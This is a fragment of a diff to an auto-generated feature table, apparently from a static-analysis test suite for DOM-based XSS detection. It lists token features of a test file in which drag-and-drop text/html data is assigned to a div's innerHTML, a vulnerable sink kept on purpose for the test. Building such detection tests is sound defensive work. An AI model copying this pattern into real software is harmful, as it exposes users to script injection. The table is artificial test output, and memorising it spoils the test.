autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:41 | dataTransfer.getData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | dataTra ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | dataTra ... plain') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | dataTra ... plain') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | dataTra ... plain') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | dataTra ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | exceptional return of dataTra ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | exceptional return of dataTra ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | exceptional return of dataTra ... plain') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | exceptional return of dataTra ... plain') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:22:42:55 | exceptional return of dataTra ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:35:42:41 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:35:42:41 | getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:35:42:41 | getData | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:35:42:41 | getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:35:42:41 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:43:42:54 | 'text/plain' | CalleeFlexibleAccessPath | dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:43:42:54 | 'text/plain' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:43:42:54 | 'text/plain' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13540,11 +100389,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:43:42:54 | 'text/plain' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:43:42:54 | 'text/plain' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:42:43:42:54 | 'text/plain' | receiverName | dataTransfer | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:18 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:18 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:18 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:18 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html = ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html = ... /html') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html = ... /html') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html = ... /html') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:15:43:54 | html = ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:33 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:33 | dataTransfer | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:33 | dataTransfer | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:33 | dataTransfer | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:33 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:41 | dataTransfer.getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:41 | dataTransfer.getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:41 | dataTransfer.getData | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:41 | dataTransfer.getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:41 | dataTransfer.getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | contextSurroundingFunctionParameters | ()\n(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | exceptional return of dataTra ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | exceptional return of dataTra ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | exceptional return of dataTra ... /html') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | exceptional return of dataTra ... /html') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:22:43:54 | exceptional return of dataTra ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:35:43:41 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:35:43:41 | getData | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:35:43:41 | getData | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:35:43:41 | getData | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:35:43:41 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:43:43:53 | 'text/html' | CalleeFlexibleAccessPath | dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:43:43:53 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:43:43:53 | 'text/html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13553,6 +100437,121 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:43:43:53 | 'text/html' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:43:43:53 | 'text/html' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:43:43:43:53 | 'text/html' | receiverName | dataTransfer | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:17 | !text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:17 | !text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:17 | !text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:17 | !text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:17 | !text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:26 | !text && !html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:26 | !text && !html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:26 | !text && !html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:26 | !text && !html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:13:44:26 | !text && !html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:14:44:17 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:22:44:26 | !html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:22:44:26 | !html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:22:44:26 | !html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:22:44:26 | !html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:22:44:26 | !html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:44:23:44:26 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | e | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | e | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | html | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | text | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | text | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:9 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:24 | e.preventDefault | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:24 | e.preventDefault | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:24 | e.preventDefault | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:24 | e.preventDefault | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:24 | e.preventDefault | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | e.preventDefault() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | e.preventDefault() | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | e.preventDefault() | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | e.preventDefault() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | e.preventDefault() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | exceptional return of e.preventDefault() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | exceptional return of e.preventDefault() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | exceptional return of e.preventDefault() | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | exceptional return of e.preventDefault() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:9:46:26 | exceptional return of e.preventDefault() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:11:46:24 | preventDefault | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:11:46:24 | preventDefault | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:11:46:24 | preventDefault | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:11:46:24 | preventDefault | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:46:11:46:24 | preventDefault | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:17 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:17 | div | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:17 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:17 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:17 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div = d ... ('div') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div = d ... ('div') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div = d ... ('div') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div = d ... ('div') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:15:48:49 | div = d ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:28 | document | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:28 | document | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:28 | document | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:28 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:28 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:42 | documen ... Element | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:42 | documen ... Element | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:42 | documen ... Element | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:42 | documen ... Element | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:42 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | documen ... ('div') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | documen ... ('div') | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | documen ... ('div') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | documen ... ('div') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | documen ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | exceptional return of documen ... ('div') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | exceptional return of documen ... ('div') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | exceptional return of documen ... ('div') | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | exceptional return of documen ... ('div') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:21:48:49 | exceptional return of documen ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:30:48:42 | createElement | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:30:48:42 | createElement | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:30:48:42 | createElement | enclosingFunctionBody | div document createElement div div ondrop e DragEvent dataTransfer e dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:30:48:42 | createElement | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:30:48:42 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:44:48:48 | 'div' | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:44:48:48 | 'div' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:48:44:48:48 | 'div' | contextFunctionInterfaces | 